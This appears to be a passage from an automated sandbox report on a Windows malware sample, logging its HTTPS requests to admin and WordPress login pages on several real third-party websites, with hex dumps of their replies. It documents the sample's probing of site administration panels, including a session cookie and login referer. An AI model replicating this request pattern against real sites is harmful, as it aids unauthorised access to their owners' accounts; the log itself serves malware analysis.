                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC741INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 76 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, ma
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC628INData Raw: 37 63 62 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c
                                                                                                                                                                                                    Data Ascii: 7cb9<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"><link rel="pingback" href="https://hightideinc.com/xmlrpc.php" /><script type="text/javascript">document.documentElement.cl
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC1369INData Raw: 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 62 6f 64 79 22 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 7d 3b 22 63 6f 6d 70 6c 65 74 65 22 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 3f 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 62 29 3a 77 69 6e 64 6f 77 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 77 69 6e 64 6f 77 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 62 29 3a 62 28 29 7d 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 22 65 74 2d 64 69 76 69 2d 75 73 65 72 66 6f 6e 74 73 22 3e 40 66 6f 6e 74 2d 66 61 63
                                                                                                                                                                                                    Data Ascii: document.getElementsByTagName("body")[0].appendChild(a)};"complete"!==document.readyState?window.addEventListener?window.addEventListener("load",b):window.attachEvent&&window.attachEvent("onload",b):b()}();</script><style id="et-divi-userfonts">@font-fac
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC1369INData Raw: 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 48 69 67 68 20 54 69 64 65 20 49 6e 63 2e 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 44 69 76 69 20 76 2e 34 2e 32 33 2e 31 22 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 77 70 2d 62 6c 6f 63
                                                                                                                                                                                                    Data Ascii: ://hightideinc.com/feed/" /><link rel="alternate" type="application/rss+xml" title="High Tide Inc. &raquo; Comments Feed" href="https://hightideinc.com/comments/feed/" /><meta content="Divi v.4.23.1" name="generator" /><link rel="stylesheet" id="wp-bloc
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC1369INData Raw: 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 5f 5f 63 69 74 61 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 2e 32 35 65 6d 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 37 35 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73
                                                                                                                                                                                                    Data Ascii: ,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-s
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC1369INData Raw: 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 36 35 29 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 76 69 64 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 76 69 64 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 36 35 29 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 76 69 64 65 6f 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 65 6d 70 6c 61 74 65 2d 70 61 72 74 2e
                                                                                                                                                                                                    Data Ascii: k-theme .wp-block-table figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video{margin:0 0 1em}.wp-block-template-part.
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC1369INData Raw: 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 31 32 32 2c 32 32 30 2c 31 38 30 29 20 30 25 2c 72 67 62 28 30 2c 32 30 38 2c 31 33 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 2d 74 6f 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 32 2c 31 38 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e
                                                                                                                                                                                                    Data Ascii: ient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: lin
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC1369INData Raw: 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 78 2d 6c 61 72 67 65 3a 20 34 32 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 34 30 3a 20 31 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 35 30 3a 20 31 2e 35 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d
                                                                                                                                                                                                    Data Ascii: -size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC1369INData Raw: 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 32 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32 65 6d 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 20 21
                                                                                                                                                                                                    Data Ascii: layout-constrained > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-constrained > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-constrained > .aligncenter{margin-left: auto !
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC1369INData Raw: 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 29 20 21
                                                                                                                                                                                                    Data Ascii: ) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    280192.168.2.462828159.203.32.44436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC177OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                    Host: jamiesonmullin.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC176INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 32 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:40 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 3029Connection: closeContent-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC3029INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 2c 20 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 72 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><meta content="IE=edge" http-equiv="X-UA-Compatible"> <meta charset="utf-8"/> <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, viewport-fit=cover" name="viewport"> <meta con


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    281192.168.2.462767185.54.192.1254436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC263OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: talentius.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PHPSESSID=tsjerc0qbgetoevok3cpga3dv1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://talentius.com/wp-login.php
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC319INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 2c 68 32 63 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 55 70 67 72 61 64 65 2c 20 63 6c 6f 73 65 0d 0a 54 72 61 6e 73 66
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenDate: Sun, 26 Nov 2023 05:59:41 GMTServer: Apache/2.4.52 (Ubuntu)Pragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Upgrade: h2,h2cConnection: Upgrade, closeTransf
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC2741INData Raw: 61 61 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 66 6f 6c 6c 6f 77 27
                                                                                                                                                                                                    Data Ascii: aa9<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" lang="es-ES"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width"><meta name='robots' content='noindex,follow'


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    282192.168.2.46283454.83.33.364436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC171OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                    Host: ce-logic.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC294INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 0d 0a 6c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 63 65 2d 6c 6f 67 69 63 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 70 61 67 65 73 2f 0d 0a 76 61 72 79 3a 20 58 2d 46 6f 72 77 61 72 64 65 64 2d 50 72 6f 74 6f 63 6f 6c 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 05:59:41 GMTServer: Apache/2.4.52 (Ubuntu)location: https://ce-logic.com/admin/pages/vary: X-Forwarded-Protocolcache-control: no-cache, no-store, must-revalidateContent-Length: 0Connection: closeCon


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    283192.168.2.46275374.220.219.1894436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC175OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                    Host: himontessori.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC420INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 68 69 6d 6f 6e 74 65 73 73 6f 72 69 2e 63 6f 6d 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 77 2e 6f 72 67 2f 22 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 2c 68 32 63 0d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:41 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://himontessori.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2c
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC7772INData Raw: 32 62 34 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 61 72 74 69 63 6c 65 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 61 72 74 69 63 6c 65 23 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20
                                                                                                                                                                                                    Data Ascii: 2b47<!doctype html><html lang="en-US" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# article: http://ogp.me/ns/article#"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile"
